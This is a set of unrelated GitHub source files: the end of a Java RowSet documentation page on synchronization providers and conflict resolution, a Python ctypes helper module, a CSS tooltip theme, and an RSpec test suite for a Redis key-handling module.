synchronization. These operations are shown in the following code fragment.
<PRE>
SyncProvider sync = crs.getSyncProvider();
switch (sync.getProviderGrade()) {
      case SyncProvider.GRADE_CHECK_ALL_AT_COMMIT:
        // A high grade of optimistic synchronization
        break;
      case SyncProvider.GRADE_CHECK_MODIFIED_AT_COMMIT:
        // A low grade of optimistic synchronization
        break;
      case SyncProvider.GRADE_LOCK_WHEN_LOADED:
        // A pessimistic synchronization grade
        break;
      case SyncProvider.GRADE_LOCK_WHEN_MODIFIED:
        // A pessimistic synchronization grade
        break;
      case SyncProvider.GRADE_NONE:
        // No synchronization with the originating data source provided
        break;
    }

    switch (sync.getDataSourceLock()) {
      case SyncProvider.DATASOURCE_DB_LOCK:
        // A lock is placed on the entire data source that is used by the
        // RowSet object
        break;
      case SyncProvider.DATASOURCE_NO_LOCK:
        // No locks remain on the originating data source.
        break;
      case SyncProvider.DATASOURCE_ROW_LOCK:
        // A lock is placed on the rows that are touched by the original
        // SQL statement used to populate
        // the RowSet object that is using the SyncProvider
        break;
      case SyncProvider.DATASOURCE_TABLE_LOCK:
        // A lock is placed on all tables that are touched by the original
        // SQL statement used to populate
        // the RowSet object that is using the SyncProvider
        break;
    }
</PRE>
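An application can also request a different degree of locking before synchronizing,
where the provider supports it, by calling the <code>setDataSourceLock</code> method,
as in this brief sketch:
<PRE>
    // ask the provider to hold row-level locks during synchronization
    sync.setDataSourceLock(SyncProvider.DATASOURCE_ROW_LOCK);
</PRE>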
It is also possible using the static utility method in the
<code>SyncFactory</code> class to determine the list of <code>SyncProvider</code>
implementations currently registered with the <code>SyncFactory</code>.
<pre>
Enumeration e = SyncFactory.getRegisteredProviders();
</pre>
</ul>
<h3><a name="resolving">4.0 Resolving Synchronization Conflicts</h3>
The interface <code>SyncResolver</code> provides a way for an application to
decide manually what to do when a conflict occurs. When the <code>CachedRowSet</code>
method <code>acceptChanges</code> finishes and has detected one or more conflicts,
it throws a <code>SyncProviderException</code> object. An application can
catch the exception and
have it retrieve a <code>SyncResolver</code> object by calling the method
<code>SyncProviderException.getSyncResolver()</code>.
<P>
A <code>SyncResolver</code> object, which is a special kind of
<code>CachedRowSet</code> object or
a <code>JdbcRowSet</code> object that has implemented the <code>SyncResolver</code>
interface, examines the conflicts row by row. It is a duplicate of the
<code>RowSet</code> object being synchronized except that it contains only the data
from the data source this is causing a conflict. All of the other column values are
set to <code>null</code>. To navigate from one conflict value to another, a
<code>SyncResolver</code> object provides the methods <code>nextConflict</code> and
<code>previousConflict</code>.
<P>
The <code>SyncResolver</code> interface also
provides methods for doing the following:
<UL>
<LI>finding out whether the conflict involved an update, a delete, or an insert
<LI>getting the value in the data source that caused the conflict
<LI>setting the value that should be in the data source if it needs to be changed
or setting the value that should be in the <code>RowSet</code> object if it needs
to be changed
</UL>
<P>
When the <code>CachedRowSet</code> method <code>acceptChanges</code> is called, it
delegates to the <code>RowSet</code> object's <code>SyncProvider</code> object.
How the writer provided by that <code>SyncProvider</code> object is implemented
determines what level (grade) of checking for conflicts will be done. After all
checking for conflicts is completed and one or more conflicts has been found, the method
<code>acceptChanges</code> throws a <code>SyncProviderException</code> object. The
application can catch the exception and use it to obtain a <code>SyncResolver</code> object.
<P>
The application can then use <code>SyncResolver</code> methods to get information
about each conflict and decide what to do. If the application logic or the user
decides that a value in the <code>RowSet</code> object should be the one to
persist, the application or user can overwrite the data source value with it.
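<P>
A typical pattern, sketched below, catches the exception, walks the conflicting rows,
and sets the value to be persisted for each conflicting column. Here <code>crs</code>
is the <code>CachedRowSet</code> object being synchronized and <code>con</code> is an
active <code>Connection</code>; which value wins is left to application logic.
<PRE>
    try {
        crs.acceptChanges(con);
    } catch (SyncProviderException spe) {
        SyncResolver resolver = spe.getSyncResolver();
        while (resolver.nextConflict()) {
            if (resolver.getStatus() == SyncResolver.UPDATE_ROW_CONFLICT) {
                crs.absolute(resolver.getRow());
                int columns = crs.getMetaData().getColumnCount();
                for (int i = 1; i <= columns; i++) {
                    if (resolver.getConflictValue(i) != null) {
                        // application logic chooses the winner;
                        // here the RowSet object's value is kept
                        resolver.setResolvedValue(i, crs.getObject(i));
                    }
                }
            }
        }
    }
</PRE>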
<P>
The comment for the <code>SyncResolver</code> interface has more detail.
<a name="relspec"><h3>5.0 Related Specifications</h3>
<ul>
<li><a href="http://java.sun.com/products/jndi">JNDI 1.3</a>
<li><a href="{@docRoot}/../technotes/guides/logging/index.html">Java Logging
APIs</a>
</ul>
<a name="reldocs"><h3>6.0 Related Documentation</h3>
<ul>
<li><a href="{@docRoot}/../technotes/tools/index.html#basic">System
properties</a>
<li>Resource Files
<li><a href="http://java.sun.com/tutorial/jdbc">DataSource for JDBC
Connections</a>
</ul>
</body>
</html>
| {
"pile_set_name": "Github"
} |
from ctypes import *
RESULT_OK, RESULT_FALSE, RESULT_ERROR = (0, 1, -1)
class POINT(Structure):
"""
POINT represents a point with two variables, x and y.
POINT is mainly used for Python <-> MML communication.
"""
_fields_ = [('x', c_int),
('y', c_int)]
class MMLException(Exception):
def __init__(self, err):
Exception.__init__(self, err)
#class PascalArray(object):
# """
# PascalArray is a class that allows one to easily use a Pascal-style
# array. It has been changed to fit my own Pascal-style arrays. (The
# length is no longer stored at -1, but at 0, and the data starts at 1.)
# This makes freeing the data much easier.
#
# The implementation is limited to reading and writing data.
# It cannot resize arrays nor can it create them.
#
# This class is more like a temporary solution to passing arrays and such.
# The actual user should not be bothered by the external memory, so most
# likely we will simply turn this data into python lists. The only
# drawback would be the overhead created by doing so.
# """
# def __init__(self, pastype, ptr, MC):
# """
# Set the type of the data we are holding to _pastype_,
# save the pointer _ptr_ and store the reference to the MMLCore.
# """
# self._type = pastype
# self._p = ptr
# self._mc = MC
#
# def __del__(self):
# """
# Free the array. Perhaps we should do reference counting on the
# pointer?
# """
# self._mc.dll.fpc_freemem_(self._p)
#
# def __len__(self):
# """
# Return the length of the array.
# """
# return cast(self._p, POINTER(c_ulong))[0]
#
# def __getitem__(self, pos):
# """
# Get an item at a specific position _pos_.
# """
# if pos > len(self):
# print 'Out of range'
# return None
# return cast(self._p, POINTER(self._type))[pos+1]
#
# def __setitem__(self, pos, item):
# """
# Set an item at a specific position _pos_.
# """
# if pos > len(self):
# print 'Out of range'
# return
# if sizeof(item) != sizeof(self._type):
# print 'Incorrect structure'
# return
# cast(self._p, POINTER(self._type))[pos] = item
PPOINT = POINTER(POINT)
PINTEGER = POINTER(c_int)
isiterable = lambda x: hasattr(x, '__iter__')
| {
"pile_set_name": "Github"
} |
.tooltipster-punk {
border-radius: 5px;
border-bottom: 3px solid #f71169;
background: #2a2a2a;
color: #fff;
}
.tooltipster-punk .tooltipster-content {
font-family: 'Courier', monospace;
font-size: 14px;
line-height: 16px;
padding: 8px 10px;
} | {
"pile_set_name": "Github"
} |
# frozen_string_literal: true
require 'spec_helper'
describe "Stealth::Redis" do
class RedisTester
include Stealth::Redis
end
let(:redis_tester) { RedisTester.new }
let(:key) { 'xyz' }
describe "get_key" do
it "should return the key from Redis if an expiration is not set" do
$redis.set(key, 'abc')
expect(redis_tester.send(:get_key, key)).to eq 'abc'
end
it "should call getex if an expiration is set" do
expect(redis_tester).to receive(:getex).with(key, 30)
redis_tester.send(:get_key, key, expiration: 30)
end
end
describe "delete_key" do
it 'should delete the key from Redis' do
$redis.set(key, 'abc')
expect(redis_tester.send(:get_key, key)).to eq 'abc'
redis_tester.send(:delete_key, key)
expect(redis_tester.send(:get_key, key)).to be_nil
end
end
describe "getex" do
it "should return the key from Redis" do
Stealth.config.session_ttl = 50
$redis.set(key, 'abc')
expect(redis_tester.send(:getex, key)).to eq 'abc'
end
it "should set the expiration of a key in Redis" do
Stealth.config.session_ttl = 50
$redis.set(key, 'abc')
redis_tester.send(:getex, key)
expect($redis.ttl(key)).to be_between(0, 50).inclusive
end
it "should update the expiration of a key in Redis" do
Stealth.config.session_ttl = 500
$redis.setex(key, 50, 'abc')
redis_tester.send(:getex, key)
expect($redis.ttl(key)).to be_between(400, 500).inclusive
end
end
describe "persist_key" do
it "should set the key in Redis" do
Stealth.config.session_ttl = 50
redis_tester.send(:persist_key, key: key, value: 'zzz')
expect($redis.get(key)).to eq 'zzz'
end
it "should set the expiration to session_ttl if none specified" do
Stealth.config.session_ttl = 50
redis_tester.send(:persist_key, key: key, value: 'zzz')
expect($redis.ttl(key)).to be_between(0, 50).inclusive
end
it "should set the expiration to the specified value when provided" do
Stealth.config.session_ttl = 50
redis_tester.send(:persist_key, key: key, value: 'zzz', expiration: 500)
expect($redis.ttl(key)).to be_between(400, 500).inclusive
end
end
end
| {
"pile_set_name": "Github"
} |